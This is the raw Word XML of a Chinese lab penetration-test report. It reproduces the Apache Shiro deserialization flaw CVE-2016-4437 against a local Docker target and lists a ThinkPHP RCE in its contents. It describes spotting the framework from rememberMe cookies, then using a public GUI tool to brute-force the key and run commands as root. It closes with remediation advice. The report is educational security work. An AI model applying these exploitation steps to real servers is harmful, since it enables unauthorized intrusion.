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7"/>
        <w:spacing w:before="163"/>
        <w:ind w:firstLine="0" w:firstLineChars="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:spacing w:before="163"/>
        <w:ind w:firstLine="0" w:firstLineChars="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120"/>
        <w:ind w:firstLine="0" w:firstLineChars="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="黑体"/>
          <w:b/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120"/>
        <w:ind w:firstLine="0" w:firstLineChars="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="黑体"/>
          <w:b/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120"/>
        <w:ind w:firstLine="0" w:firstLineChars="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:b/>
          <w:bCs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CVE经典漏洞复现</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120"/>
        <w:ind w:firstLine="0" w:firstLineChars="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="黑体"/>
          <w:b/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsia="黑体"/>
          <w:b/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t>渗透测试报告</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:spacing w:before="163"/>
        <w:ind w:firstLine="0" w:firstLineChars="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120"/>
        <w:ind w:firstLine="0" w:firstLineChars="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="0" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="黑体"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="0" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="黑体"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="0" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="黑体"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="0" w:firstLineChars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202</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>年</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>月</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="0" w:firstLineChars="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs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595" w:gutter="0"/>
          <w:cols w:space="425" w:num="1"/>
          <w:docGrid w:type="lines" w:linePitch="326" w:charSpace="0"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:sdt>
      <w:sdtPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:kern w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="zh-CN"/>
        </w:rPr>
        <w:id w:val="-751738428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zh-CN"/>
        </w:rPr>
      </w:sdtEndPr>
      <w:sdtContent>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="33"/>
            <w:numPr>
              <w:ilvl w:val="0"/>
              <w:numId w:val="0"/>
            </w:numPr>
            <w:ind w:left="480"/>
            <w:jc w:val="center"/>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:lang w:val="zh-CN"/>
            </w:rPr>
            <w:t>目录</w:t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_Toc32040 </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
            </w:rPr>
            <w:t>1 报告</w:t>
          </w:r>
          <w:r>
            <w:t>摘要</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc32040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_Toc21314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测试</w:t>
          </w:r>
          <w:r>
            <w:t>方法</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc21314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_Toc22817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 测试</w:t>
          </w:r>
          <w:r>
            <w:t>对象</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc22817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 测试</w:t>
          </w:r>
          <w:r>
            <w:t>工具</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc2284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_Toc26503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利用漏洞详情</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc26503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_Toc11058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 漏洞汇总</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc11058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 漏洞详情</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc1387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_Toc31751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30"/>
            </w:rPr>
            <w:t xml:space="preserve">3.2.1 </w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
              <w:bCs/>
              <w:szCs w:val="30"/>
            </w:rPr>
            <w:t>Apache Shiro 反序列化漏洞 CVE-2016-4437</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc31751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_Toc27022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32"/>
              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
            </w:rPr>
            <w:t xml:space="preserve">3.2.2 </w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
              <w:szCs w:val="32"/>
            </w:rPr>
            <w:t>ThinkPHP 任意代码执行 CNVD-2018-24942 等 RCE 经典漏洞</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc27022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ind w:firstLine="482"/>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:bCs/>
              <w:lang w:val="zh-CN"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:ind w:firstLine="562"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:sectPr>
          <w:headerReference r:id="rId11" w:type="default"/>
          <w:footerReference r:id="rId12" w:type="default"/>
          <w:pgSz w:w="11906" w:h="16838"/>
          <w:pgMar w:top="1440" w:right="1800" w:bottom="1440" w:left="1800" w:header="851" w:footer="595" w:gutter="0"/>
          <w:pgNumType w:fmt="upperRoman" w:start="1"/>
          <w:cols w:space="425" w:num="1"/>
          <w:docGrid w:type="lines" w:linePitch="326" w:charSpace="0"/>
        </w:sectPr>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="10"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc32040"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>报告</w:t>
      </w:r>
      <w:r>
        <w:t>摘要</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p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12" w:lineRule="atLeast"/>
        <w:ind w:left="0" w:right="0" w:firstLine="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vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>Apache Shiro是一个强大且易用的Java安全框架，执行身份验证、授权、密码和会话管理。使用Shiro易于理解的API，开发者可以快速、轻松地获得任何应用程序，从最小的移动应用程序到最大的网络和企业应用程序</w:t>
      </w:r>
    </w:p>
    <w:p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12" w:lineRule="atLeast"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0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vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>在Shiro &lt;= 1.2.4中，反序列化过程中所用到的AES加密的key是硬编码在源码中，当用户勾选RememberMe并登录成功，Shiro会将用户的cookie值序列化，AES加密，接着base64编码后存储在cookie的rememberMe字段中，服务端收到登录请求后，会对rememberMe的cookie值进行base64解码，接着进行AES解密，然后反序列化。由于AES加密是对称式加密（key既能加密数据也能解密数据），所以当攻击者知道了AES key后，就能够构造恶意的rememberMe cookie值从而触发反序列化漏洞</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc21314"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>测试</w:t>
      </w:r>
      <w:r>
        <w:t>方法</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc22817"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>测试</w:t>
      </w:r>
      <w:r>
        <w:t>对象</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="3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6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目标系统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jc w:val="left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Docker搭建的靶场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实施工程师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杨佳伲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实施时间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2025/7/02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实施地点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成都信息工程大学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备注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>
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc2284"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>测试</w:t>
      </w:r>
      <w:r>
        <w:t>工具</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="0" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>根据测试的范围，本次渗透测试可能用到的相关工具列表如下：</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="3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6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2" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2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工具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6530" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2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功能和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2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Burpsuite</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6530" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr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网络抓包工具，对网络的数据包传输进行抓取。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2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Kali linux</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6530" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr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开源工具集，包括nmap (端口扫描器)、Wireshark (数据包分析器)、John the Ripper (密码破解器),以及Aircrack-ng (一应用于对无线局域网进行渗透测试的软件).[2] 用户可通过硬盘、live CD或live USB运行Kali Linux。Metasploit的Metasploit Framework支持Kali Linux，Metasploit一套针对远程主机进行开发和执行Exploit代码的工具。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2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其它</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6530" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr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多种工具交叉验证。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc26503"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>利用漏洞详情</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_Toc11058"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞汇总</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="17"/>
        <w:tblW w:w="92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0"/>
        <w:gridCol w:w="2094"/>
        <w:gridCol w:w="2868"/>
        <w:gridCol w:w="10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3160" w:type="dxa"/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漏洞名称</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2094" w:type="dxa"/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漏洞等级</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2868" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D8D8D8" w:themeFill="background1" w:themeFillShade="D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:wordWrap w:val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问题U</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>RL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1088" w:type="dxa"/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复测情况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3160" w:type="dxa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Apache Shiro反序列化漏洞cve-2016-4437</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2094" w:type="dxa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2868" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:wordWrap w:val="0"/>
              <w:ind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http://127.0.0.1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>:8080/</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1088" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0" w:firstLineChars="0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3160" w:type="dxa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ThinkPHP 任意代码执行 CNVD-2018-24942 等 RCE 经典漏洞</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2094" w:type="dxa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2868" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:wordWrap w:val="0"/>
              <w:ind w:firstLine="0" w:firstLineChars="0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http://127.0.0.1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>:8080/</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1088" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Toc1387"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞详情</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:rPr>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_Toc31751"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>Apache Shiro 反序列化漏洞 CVE-2016-4437</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="16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4219"/>
        <w:gridCol w:w="1701"/>
        <w:gridCol w:w="11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</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>名称</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4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default" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="宋体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Cs w:val="21"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>Apache Shiro反序列化漏洞cve-2016-4437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漏洞等级</w:t>
            </w:r>
          </w:p>
        </w:tc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120" w:firstLineChars="50"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="宋体"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFC000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bCs/>
                <w:color w:val="FFC000"/>
                <w:szCs w:val="21"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>高危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漏洞地址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 w:eastAsia="宋体"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>http://127.0.0.1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>:8080/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</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>描述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Apache Shiro是一款开源强大且易用的Java安全框架，提供身份验证、授权、密码学和会话管理。Shiro框架直观、易用，同时也能提供健壮的安全性。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微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="宋体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因为在反序列化时,不会对其进行过滤,所以如果传入恶意代码将会造成安全问题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漏洞证明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设置代理，随便输入账号密码，使用burp抓取请求包，</w:t>
            </w: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FFFFF"/>
              </w:rPr>
              <w:t>在响应包中显示两个Set-Cookie: rememberMe=deleteMe，说明存在shiro框架可能存在漏洞</w:t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452620" cy="3430905"/>
                  <wp:effectExtent l="0" t="0" r="12700" b="13335"/>
                  <wp:docPr id="3" name="图片 3" descr="Snipaste_2025-07-07_18-47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nipaste_2025-07-07_18-47-0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2620" cy="343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leftChars="0" w:right="0" w:firstLine="0" w:firstLineChars="0"/>
              <w:jc w:val="both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工具地址：https://github.com/j1anFen/shiro_attack</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="1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leftChars="0" w:right="0" w:firstLine="0" w:firstLineChars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检测是否存在漏洞，</w:t>
            </w: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依照下图顺序，输入目标地址的路径，修改请求方法后，点击爆破秘钥。</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Arial" w:hAnsi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  <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>（</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Arial" w:hAnsi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  <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>需要java 8环境最好</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Arial" w:hAnsi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  <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>）</w:t>
            </w:r>
          </w:p>
          <w:p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Chars="0" w:right="0" w:rightChars="0"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300">
                  <wp:extent cx="4356100" cy="3573780"/>
                  <wp:effectExtent l="0" t="0" r="2540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100" cy="357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Chars="0" w:right="0" w:rightChars="0"/>
              <w:jc w:val="both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图形化界面的漏洞利用方式是比较简单的，在上图的基础上点击检测当前利用链。</w:t>
            </w:r>
          </w:p>
          <w:p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Chars="0" w:right="0" w:rightChars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点到命令执行的界面，输入命令，点击执行。这边看到，我们已经拿到了root的权限。</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:ind w:left="0" w:leftChars="0" w:firstLine="0" w:firstLineChars="0"/>
            </w:pPr>
            <w:r>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300">
                  <wp:extent cx="4353560" cy="3769360"/>
                  <wp:effectExtent l="0" t="0" r="5080" b="1016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60" cy="376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2" w:afterAutospacing="0" w:line="288" w:lineRule="atLeast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ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="4D4D4D"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>该漏洞复现完成！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szCs w:val="21"/>
              </w:rPr>
              <w:t>整改建议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default" w:ascii="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">1. 立即升级Shiro版本 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>将Apache Shiro升级至1.2.5及以上版本，官方在该版本中通过默认禁用`rememberMe`功能的AES-CBC加密密钥硬编码问题修复了此漏洞。建议升级至最新稳定版（如1.12.0+），以同时获取其他安全补丁。</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">2. 自定义加密密钥 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>若无法立即升级，需在`shiro.ini`或配置文件中显式设置`securityManager.rememberMeManager.cipherKey`属性，使用强随机生成的密钥（至少128位）替换默认密钥，确保密钥复杂度并严格保密。</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">3. 禁用RememberMe功能（临时措施）  </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> 若业务无需此功能，可通过配置`securityManager.rememberMeManager = null`彻底关闭，消除反序列化入口点。</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
